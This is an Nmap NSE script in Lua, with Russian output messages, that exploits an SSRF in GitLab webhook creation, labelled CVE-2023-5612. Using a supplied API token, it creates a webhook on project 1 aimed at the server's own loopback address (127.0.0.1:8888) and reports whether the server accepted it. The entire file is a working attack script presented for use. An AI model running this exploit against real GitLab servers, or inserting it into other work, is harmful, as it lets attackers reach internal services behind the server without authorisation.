local http = require "http"
local json = require "json"
local stdnse = require "stdnse"
local shortport = require "shortport"

description = [[
Exploits CVE-2023-5612 - GitLab SSRF via webhook creation.
]]

author = "Topskiy_Pavel"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "exploit"}

portrule = shortport.http

action = function(host, port)
  local token = stdnse.get_script_args("gitlab.token")
  if not token then
    return "❌ Токен не указан: --script-args gitlab.token=TOKEN"
  end

  local path = "/api/v4/projects/1/hooks"
  local target_url = "http://127.0.0.1:8888"
  local payload = json.encode({ url = target_url })

  local request_opts = {
    header = {
      ["Content-Type"] = "application/json",
      ["PRIVATE-TOKEN"] = token
    },
    content = payload
  }

  stdnse.print_debug(1, "=== GitLab SSRF (CVE-2023-5612) запускается ===")
  stdnse.print_debug(1, "📡 Цель: http://%s:%s%s", host.ip, port.number, path)
  stdnse.print_debug(1, "📦 Payload: %s", payload)

  local response = http.post(host, port, path, request_opts)

  if not response then
    return "❌ Ошибка: нет ответа от GitLab"
  end

  if response.status == 201 then
    return "✅ Уязвимость подтверждена! Webhook добавлен: " .. target_url
  elseif response.status == 401 then
    return "🔐 Токен неверный или истёк (401)"
  elseif response.status == 404 then
    return "❓ Проект не найден (ID=1). Проверь правильность project_id"
  else
    return string.format("📥 HTTP статус: %d\n📥 Ответ: %s", response.status, response.body)
  end
end
